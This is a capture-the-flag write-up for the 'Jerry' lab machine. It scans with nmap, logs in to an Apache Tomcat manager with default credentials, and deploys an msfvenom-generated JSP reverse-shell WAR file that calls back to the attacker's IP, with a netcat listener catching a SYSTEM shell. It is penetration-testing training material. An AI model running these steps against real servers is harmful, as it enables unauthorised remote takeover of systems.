Jerry Writeup

Without Metasploit

Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn)

nmap -Pn 10.10.10.95

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 8080

  • (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 8080 -oN nmap 10.10.10.95

Lets go visit the web server this machine is hosting on port 8080.

Looking at the site and testing around tells us that Apache Tomcat/7.0.88 is running on it and we need a set of credentials to login as manger to perform other actions.

What we can do now is to go to google and search for default credentials that might work and let us login into the server. Also we can see a username and a password on the error page we get when we try to access the manager app with wrong credentials

Lets try logging in with these credentials

And we are logged in! Now looking at the application we can see that we have an option to upload and execute WAR files, this is something that we can generate using msfvenom and try getting a reverse shell on the server.

Exploitation

First we have to generate the msfvenom war file calling it reverse.war. I'm using my machines IP for LHOST (Listening Host), make sure to add your IP to the command.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f war > reverse.war

Now lets upload the file

After clicking deploy we can see that it has been added as a path under the Applications tab

After clicking the link (/reverse) we will get a reverse shell, so we first have to start a Netcat listener on our machine.

nc -lvnp 1234

Once we click the link, we get the reverse shell and as nt authority\system

Last updated